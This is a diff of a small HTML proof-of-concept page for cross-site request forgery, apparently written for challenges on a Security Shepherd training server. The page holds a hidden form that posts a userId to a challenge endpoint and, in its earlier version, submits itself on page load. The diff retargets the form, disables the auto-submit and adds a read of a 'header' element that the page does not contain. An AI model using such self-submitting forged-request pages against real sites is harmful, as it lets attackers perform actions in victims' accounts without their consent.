--- a/index.html
+++ b/index.html
@@ -3,18 +3,21 @@
     <head>
         <title>Crazydais - CSRF</title>
     </head>
-    
+
     <body>
         <h1>Crazydais - CSR</h1>
-        
-        <form id="csrf" action="https://shepherd.waratek.lan/user/csrfchallengetwo/plusplus" method="POST">
+
+        <form id="csrf" action="https://shepherd.waratek.lan/user/csrfchallengethree/plusplus" method="POST">
             <input type="hidden" name="userId" value="fcab4e7dfbe01ce4e3904b97febe6a6a184302c3"/>
         </form>
 
         <script>
             (function () {
                 var form = document.getElementById("csrf");
-                form.submit();
+
+                var header = document.getElementById("header").value;
+                console.log(header);
+                //form.submit();
             })();
         </script>
     </body>
